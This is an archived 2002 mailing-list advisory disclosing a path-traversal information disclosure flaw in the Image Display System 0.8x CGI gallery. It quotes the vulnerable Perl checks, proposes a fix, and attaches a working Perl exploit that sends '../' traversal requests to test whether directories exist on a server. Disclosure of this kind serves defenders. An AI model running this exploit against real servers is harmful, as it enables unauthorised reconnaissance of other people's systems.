Hello,
There is a information disclosure vulnerability in IDS 0.8x (assume other versions vulnerable).
IDS is used a cgi based image thumbnail gallery. When an attacker sends the variable album
a traversed directory (ie. /../../../../home/foobar) it is possible to tell if the specified
directory exists by examining the returned error page. This is possible do to the following
snippit of code:
idsShared.pm::getAlbumToDisplay()
=================================
if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
}
if ($albumtodisplay =~ /\.\./) { # hax0r protection...
bail ("Sorry, invalid directory name: $!");
}
Attached below is a working exploit for this vulnerability. The fix is simple, just flip the if
statements around so it checks for ..'s first. Also note there is the same type of information
disclosure vulnerability in index.cgi via the following code (I have just not verified if it is
exploitable, although is obviously seems as though it is):
index.cgi::processData()
========================
if ($mode eq 'image') {
getAlbumToDisplay();
$imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!");
unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
}
}
if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
bail ("Directory/image paths must not include \"../\".");
}
Have a good one,
isox
<--- Begin Exploit Code --->
#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isoxat_private]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year? Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox. Check 0xc0ffee.com for
# more information.
#
$maxdepth = 30;
&Banner;
if ($#ARGV < 3) {
die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}
for($t=0; $t<$maxdepth; $t++) {
$dotdot = "$dotdot" . "/..";
}
$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);
if($blahblah =~ /Sorry, invalid directory name/) {
print("$ARGV[0] Exists.\n");
} else {
print("$ARGV[0] Does Not Exist.\n");
}
exit 0;
sub Banner {
print("IDS Information Disclosure Exploit\n");
print("Written by isox [isox\@chainsawbeer.com]\n\n");
}
sub Directory {
use IO::Socket::INET;
my($query, $host, $port) = @_;
$sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Timeout => 8,
Proto => 'tcp'
);
if(!$sock) {
die("sock: timed out\n");
}
print $sock $query;
read($sock, $buf, 8192);
close($sock);
return $buf;
}
<-- EOF -->
This archive was generated by hypermail 2b30 : Tue May 28 2002 - 14:21:27 PDT